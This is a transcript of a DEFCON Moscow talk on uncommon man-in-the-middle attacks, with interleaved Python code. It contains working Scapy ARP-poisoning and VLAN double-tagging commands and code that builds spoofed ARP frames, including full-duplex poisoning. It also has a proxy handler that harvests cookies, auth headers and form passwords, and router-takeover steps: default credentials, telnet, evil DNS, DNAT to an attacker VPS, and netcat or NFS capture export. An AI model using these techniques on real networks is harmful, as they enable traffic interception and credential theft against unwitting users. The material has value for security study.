
Oleg Kupreev - Uncommon MiTM in uncommon conditions

DC7499
October 03, 2015

DEFCON Moscow 10


Transcript

  2. Uncommon MiTM in uncommon conditions

  3. 00 WHOAMI
     • @090h, root@0x90.ru, keybase.io/090h
     • ZN HW Village organizer, hardware@zeronights.ru
     • 802.11 pwner, SDR/RF enthusiast
     • embedded reverser (for PWN/DIY)
     • JBFC/DC7499 member
     • researcher at hlsec.ru
     • pwning telecommunications since 2002
     • …was doing MITM 20 years ago 8)
  4. 01 INTRO
     • The XXI century is the communications century
     • When I was a boy we counted in Pentiums 8): 1993 Pentium 66 MHz – 2000 Pentium 4 1400 MHz
     • Nowadays we count in G (and still use Pentiums): 4G is in use and 5G is in progress
     • DialUp 9600 FIDO – FTTH 100 Mb Internet
     • Nearest future: 5G + IPv6 + IoE
     • Security of communications is evolving slooooooooooowly. SS7 was invented in 1975 and is kicking ass nowadays
  5. 02 MAN MITM
     • MITM = Man In The Middle
     • It is a fundamental type of communication attack
     • Subtypes: active, passive
     • IRL: passive MITM = sniff, active MITM = MITM
     • Also has a name….
  8. Alice, Bob and Eve…

  9. .. and sometimes Charlie

  10. .. and Mallory aka Trudy

  11. Implementation
     • Fundamental => data channel independent
     • Data channels: Ethernet, USB, UART, SPI, RFID, NFC, WiFi, GSM
  12. ETHERNET EVE

  13. MY FIRST SNIFFER EVE

  14. ALICE LOOKED AWESOME THESE DAYS

  15. NFC EVE

  16. Short summary
     • Technology changes – MiTM changes. Hackers should be adaptive.
     • Security of telecommunications is like in the 90’s
     • The MiTM world is much bigger than most hackers think
     • Study fundamental sciences, to be able to hack at the FUNdaMENTAL layer!
  17. I LIKE TO MITM IT MITM IT

  18. MITM I HAVE KNOWN AND LOVED
     • LAN based MITM
     • WAN based MITM
     • Rogue AP MITM (KARMA/MANA/hostapd-wpe)
     • MITM over VPN (L2TP, PPTP)
     • Hybrid MITM
  19. MITM anatomy
     • ARP/DHCP/IPv6/RogueAP/SOME_ATTACK to become MALLORY
     • PLAiN_TEXT_PROTO => SNIFF FOR LOOT + INJECT EViL
     • HTTP + BeEF hook.js => MITB = MAN_IN_THE_BROWSER
     • HTTP + BDFProxy => SHELLZ
     • SSL + PROTO => (SSLSPLIT || SSLSTRiP) => PROTO
     • SSL + PROTO => (HEARTBLEED || POODLE) => PWN
     • LOOT => cookies, credentials, photos, locations
     • Custom sniffers/injectors/sploits for protocols/apps/vulns
     • Example: SMB/NTLM relays
  20. THAT’S WHY PRACTICE RULES!

  21. Cooking MITM by ARP cache poison attack

  22. Practice with Scapy

  23. ARP attacks (Scapy)

    from scapy.all import ARP, Dot1Q, Ether, RandNum, sendp

    gateway   = "192.168.1.1"        # IP the victim uses as its default gateway (lab values)
    client    = "192.168.1.10"       # victim IP
    clientMAC = "aa:bb:cc:dd:ee:ff"  # victim MAC; Ether()/ARP() source fields default to our own

    # half duplex: only the client's ARP cache is poisoned, so client->gateway traffic
    # comes to us while gateway->client traffic still takes the real path.
    # sendp() is the layer-2 send, since we build the Ethernet header ourselves.
    sendp(Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client),
          inter=RandNum(10, 40), loop=1)

    # ARP spoofing in VLANs: double 802.1Q tagging to reach a victim in another VLAN across a trunk
    sendp(Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2)/ARP(op="who-has", psrc=gateway, pdst=client),
          inter=RandNum(10, 40), loop=1)
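The Scapy one-liners above rely on a detail the slide leaves implicit: a host that receives an ARP request still records the sender's IP-to-MAC mapping, so a who-has with a spoofed sender is enough to poison the cache. The following is an added example (not code from the talk or from the author's repos) that builds the same frames byte for byte without Scapy, parses them the way the victim's stack does, and simulates the RFC 826 cache merge; it also generalises the half-duplex snippet to full-duplex poisoning of both ends. All IPs and MACs are constructed lab values.

```python
import struct
from dataclasses import dataclass

ETH_P_ARP = 0x0806
ETH_P_8021Q = 0x8100

# Constructed lab addresses (assumptions for this example, not from the talk).
GATEWAY, CLIENT = "192.168.1.1", "192.168.1.10"
REAL_GW_MAC = "02:00:00:00:00:01"
CLIENT_MAC = "02:00:00:00:00:10"
ATTACKER_MAC = "02:00:00:00:00:aa"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def arp_who_has(dst_mac: str, src_mac: str, psrc: str, pdst: str, vlans=()) -> bytes:
    """Same wire bytes as Scapy's Ether(dst)/[Dot1Q(vlan)...]/ARP(op='who-has', psrc, pdst).
    The lie sits in the ARP *sender* fields: sender IP = psrc (the gateway), sender MAC = ours."""
    frame = mac_bytes(dst_mac) + mac_bytes(src_mac)
    for vid in vlans:                                   # 802.1Q tags, outer tag first
        frame += struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF)
    frame += struct.pack("!H", ETH_P_ARP)
    frame += struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, hlen 6, plen 4, op 1 = request
    frame += mac_bytes(src_mac) + ip_bytes(psrc)        # sender hw/proto address: the spoofed mapping
    frame += b"\x00" * 6 + ip_bytes(pdst)               # target hw (unknown) / target proto address
    return frame


@dataclass
class Arp:
    op: int
    sender_mac: str
    sender_ip: str
    target_ip: str
    vlans: tuple


def parse_arp(frame: bytes) -> Arp:
    """Decode what the victim's stack sees: strip 802.1Q tags, then read the 28-byte ARP body."""
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    off, vlans = 14, []
    while ethertype == ETH_P_8021Q:
        tci, ethertype = struct.unpack_from("!HH", frame, off)
        vlans.append(tci & 0x0FFF)
        off += 4
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _hw, _proto, _hlen, _plen, op = struct.unpack_from("!HHBBH", frame, off)
    off += 8
    smac = ":".join(f"{b:02x}" for b in frame[off:off + 6])
    sip = ".".join(str(b) for b in frame[off + 6:off + 10])
    tip = ".".join(str(b) for b in frame[off + 16:off + 20])
    return Arp(op, smac, sip, tip, tuple(vlans))


def victim_merge(cache: dict, arp: Arp, my_ip: str) -> dict:
    """RFC 826 merge step: an existing entry for the sender IP is refreshed on any ARP packet,
    and a new one is added when the packet targets us. A plain who-has therefore poisons the cache."""
    if arp.sender_ip in cache or arp.target_ip == my_ip:
        cache[arp.sender_ip] = arp.sender_mac
    return cache


def full_duplex_frames() -> list:
    """Half duplex (the slide's first snippet) poisons only the client. For full duplex also send a
    frame to the real gateway claiming the client's IP, so both directions pass through us."""
    return [
        arp_who_has(CLIENT_MAC, ATTACKER_MAC, GATEWAY, CLIENT),
        arp_who_has(REAL_GW_MAC, ATTACKER_MAC, CLIENT, GATEWAY),
    ]


def demo() -> dict:
    """Client cache after one spoofed who-has, plain and double-tagged (VLAN hopping variant)."""
    cache = {GATEWAY: REAL_GW_MAC}
    plain = arp_who_has(CLIENT_MAC, ATTACKER_MAC, GATEWAY, CLIENT)
    tagged = arp_who_has(CLIENT_MAC, ATTACKER_MAC, GATEWAY, CLIENT, vlans=(1, 2))
    victim_merge(cache, parse_arp(plain), CLIENT)
    return {"gateway_mac_now": cache[GATEWAY],      # attacker MAC: gateway-bound traffic now reaches us
            "plain_len": len(plain), "tagged_len": len(tagged),
            "tagged_vlans": parse_arp(tagged).vlans}


if __name__ == "__main__":
    print(demo())
```

The `inter=RandNum(10, 40)` in the Scapy version matters for the same reason the merge step does: ARP entries age out (typically within a minute or so), so the spoofed mapping has to be refreshed, and randomising the interval makes the stream less obvious than a fixed beacon.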
  24. Meanwhile in real world

  25. Common MITM after ARP poison

  26. IRL: WTF IS GOING ON?

  27. SOME ATTACK? MAYBE PWN THE ROUTER?

  28. PixieWPS + admin:admin @ web interface

  29. Shodan + device-pharmer.py pwnage

  30. We’ve got root! What to do next?
     • Backup configuration
     • Get shell
     • Research firmware availability
     • Have fun
  31. Backup configuration

  32. Enable telnet access

  33. Enable DynDNS if white IP

  34. Enable syslog to rsyslogd @ VPS

  35. Use Guest WiFi as tiny KARMA

  36. Separate SSID, IP mask = comfort

  37. Install plugins

  38. Enable PPTP VPN

  39. Install and use tcpdump in firmware

  40. BPF 4 YOU

  41. Set DNS to your EvilDNS with dnschef

  42. Passive MITM aka EVE at router
     • tcpdump
     • NFS mount and/or netcat
     • Write pcap file to share/pipe with tcpdump
  43. Eve on router

  44. Mallory on router
     • Set DNS to VPS
     • Install tcpdump, sslsplit, sslstrip
     • NFS mount/netcat
     • Write pcap file to share/pipe with tcpdump
  45. Mallory on router

  46. Pros and cons
     Pros:
     • Not so hard to do
     Cons:
     • Router is rebooted by watchdog or users
     • MITM is sloooooooooow because the router CPU runs hot
     • Not so many routers have such rich features
     • VPS IP disclosure during MITM
  47. WAN MITM TO VPS

  48. WAN MITM ALGO
     • Telnet to router
     • Run mitmproxy in transparent mode on VPS
     • DNAT port 80 to VPS_IP:8080
  49. Router requirements • telnet/ssh/rce/cmd inj • iptables

  50. WAN based MITM

  51. Pros and cons
     Pros:
     • Not so hard to do
     Cons:
     • Only works for HTTP traffic
     • Can’t distinguish clients by IP
     • VPS IP disclosure during MITM
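Both cons on this slide follow from where the NAT happens. The router rewrites the destination of port-80 connections to VPS_IP:8080 and source-NATs every LAN client behind its own WAN address, so the VPS sees a single peer IP for everybody and has no record of the real destination (the Linux original-destination socket option only knows about NAT done on the VPS itself). The only thing left to route on is the HTTP Host header, which TLS and other protocols do not expose in a usable form. The following is an added example, not code from the talk or from the dc7499/uncommon-mitm repo, of the request handling a transparent proxy on the VPS has to do under those conditions; it also pulls out the LOOT from slide 19. ROUTER_WAN_IP, the hostnames, cookie and credentials are constructed sample values.

```python
from urllib.parse import parse_qsl, urlsplit

ROUTER_WAN_IP = "203.0.113.7"  # constructed: every LAN client arrives from this address after the router's NAT

# Constructed sample traffic (not captures from the talk).
GET_SAMPLE = (b"GET /inbox HTTP/1.1\r\nHost: example.com\r\nUser-Agent: ExampleBrowser/1.0\r\n"
              b"Cookie: session=abc123\r\n\r\n")
POST_SAMPLE = (b"POST /login HTTP/1.1\r\nHost: example.com:8000\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\n\r\n"
               b"user=alice&pass=hunter2")
TLS_SAMPLE = b"\x16\x03\x01\x00\x5a\x01\x00\x00\x56\x03\x03" + b"\x00" * 32  # start of a TLS ClientHello


def parse_request(raw: bytes) -> dict:
    """Split one HTTP/1.x request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def upstream_for(req: dict):
    """Where to forward. The DNAT happened on the router, so on the VPS the socket's local address
    is just VPS_IP:8080 and SO_ORIGINAL_DST cannot recover the real server: the only routing
    information left is the Host header (or an absolute-form request target). None if neither."""
    if req["target"].startswith("http://"):
        u = urlsplit(req["target"])
        return u.hostname, u.port or 80
    host = req["headers"].get("host")
    if not host:
        return None
    name, _, port = host.partition(":")
    return name, int(port) if port else 80


def loot(req: dict) -> dict:
    """The slides' LOOT: cookies, HTTP auth and form credentials travelling in clear."""
    h, out = req["headers"], {}
    for key in ("cookie", "authorization"):
        if key in h:
            out[key] = h[key]
    if req["method"] == "POST" and h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        out["form"] = dict(parse_qsl(req["body"].decode("latin-1")))
    return out


def handle(raw: bytes, peer_ip: str) -> dict:
    """One DNATed connection as seen by the VPS. Non-HTTP bytes (e.g. TLS) carry no Host header,
    so there is nowhere to forward to: that is why this setup only works for plain HTTP."""
    first_line = raw.split(b"\r\n", 1)[0]
    if b" HTTP/1." not in first_line:
        return {"peer": peer_ip, "upstream": None, "loot": {}, "client_hint": None,
                "note": "not plaintext HTTP; cannot route without a Host header"}
    req = parse_request(raw)
    return {"peer": peer_ip,                                    # always the router's WAN IP, never the LAN client
            "upstream": upstream_for(req),
            "loot": loot(req),
            "client_hint": req["headers"].get("user-agent"),    # best per-client hint left after the SNAT
            "note": None}


if __name__ == "__main__":
    for sample in (GET_SAMPLE, POST_SAMPLE, TLS_SAMPLE):
        print(handle(sample, ROUTER_WAN_IP))
```

In a real deployment the same parsing happens inside mitmproxy; the point of the example is that `peer_ip` is identical for every client and `upstream_for` has nothing to work with once the bytes are not HTTP, which is exactly the two cons listed above.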
  52. HARDCORE MODE ON PPTP based MITM

  53. PPTP MITM ideas
     • MiTM consists of two parts: router and VPS
     • All active attacks run on the VPS
     • Router is used for forwarding and routing
     • pwner is pwning
  54. Router requirements
     • PPTP VPN server in firmware
     • iptables
     • telnet/ssh/rce/cmd inj
  55. VPS requirements
     • Linux
     • pptp
     • iptables
     • sslstrip, sslsplit, tcpdump, mitmproxy
  56. PPTP MITM ALGO
     • Connect from VPS to PPTP VPN
     • Get ppp0 interface IP
     • Launch MITM kit on ppp0 (sslsplit, sslstrip, iptables forwarding)
     • Telnet to router
     • Add a route to the VPS via the ISP gateway (so the tunnel does not try to route through itself)
     • Set VPS ppp0 IP as default gateway
     • PWN’em all
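The "add ISP gateway to route map" step is the one that bites. Once the default route points at the VPS address on ppp0, the router's own PPTP control and GRE packets to the VPS public IP would match that default route and be sent into the very tunnel they carry, so a more specific route to the VPS via the ISP gateway has to exist first. The following added example (not from the talk or its repos) models the router's table with a longest-prefix-match lookup and shows the route selection with and without that host route, plus what happens to LAN traffic when the tunnel drops (the con on slide 58). All addresses, interface names and the table layout are constructed assumptions.

```python
from ipaddress import ip_address, ip_network

# Constructed addresses for the example (not the talk's lab).
ISP_GW = "198.51.100.1"      # router's upstream gateway on the WAN link
VPS_IP = "203.0.113.50"      # public IP of the VPS that dialled into the router's PPTP server
PPP_PEER = "10.8.0.1"        # VPS address on the router's ppp0, inside the tunnel
DEFAULT = "0.0.0.0/0"

# Router's table before the change: (prefix, via, dev); via=None means directly connected.
ORIGINAL_TABLE = [
    (DEFAULT, ISP_GW, "eth0"),
    ("198.51.100.0/24", None, "eth0"),
    ("10.8.0.0/24", None, "ppp0"),
    ("192.168.1.0/24", None, "br0"),
]


def lookup(table, dst: str):
    """Longest-prefix match, the way the router's kernel picks a route. Returns (via, dev) or None."""
    d, best = ip_address(dst), None
    for prefix, via, dev in table:
        net = ip_network(prefix)
        if d in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, via, dev)
    return None if best is None else (best[1], best[2])


def point_default_at_tunnel(table, keep_vps_reachable: bool):
    """The slide's last two routing steps: swap the default route for the VPS ppp0 address. The /32
    route to the VPS public IP via the ISP gateway is the 'add ISP gateway to route map' step."""
    new = [r for r in table if r[0] != DEFAULT]
    if keep_vps_reachable:
        new.append((VPS_IP + "/32", ISP_GW, "eth0"))
    new.append((DEFAULT, PPP_PEER, "ppp0"))
    return new


def tunnel_path(table):
    """Which interface the router's own PPTP (TCP 1723) and GRE packets to the VPS would leave on."""
    return lookup(table, VPS_IP)


def tunnel_down(table):
    """PPTP dropped: ppp0 disappears and every route over it goes with it."""
    return [r for r in table if r[2] != "ppp0"]


def demo() -> dict:
    wrong = point_default_at_tunnel(ORIGINAL_TABLE, keep_vps_reachable=False)
    right = point_default_at_tunnel(ORIGINAL_TABLE, keep_vps_reachable=True)
    return {
        "lan_client_to_internet": lookup(right, "192.0.2.1"),         # into the tunnel, as intended
        "tunnel_pkts_without_host_route": tunnel_path(wrong),         # also into the tunnel: loops, never reaches VPS
        "tunnel_pkts_with_host_route": tunnel_path(right),            # via the ISP gateway: tunnel stays up
        "internet_after_tunnel_drop": lookup(tunnel_down(right), "192.0.2.1"),  # None: no default route left
    }


if __name__ == "__main__":
    print(demo())
```

On a real router the order of operations matters as much as the routes: add the host route before replacing the default route, otherwise the telnet session's own next-hop can flip to ppp0 halfway through and the session dies together with the tunnel.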
  57. PPTP Server on router + Mallory on VPS

  58. Pros and cons
     Pros:
     • FULL MITM
     • No IP disclosure
     Cons:
     • Router loses Internet connectivity if the PPTP connection is down
  59. REPOS/TOOLS
     REPOS
     • https://github.com/0x90/lan-warz
     • https://github.com/0x90/mitm-arsenal
     • https://github.com/0x90/scapy-arsenal
     MiTM EXAMPLES
     • https://github.com/dc7499/uncommon-mitm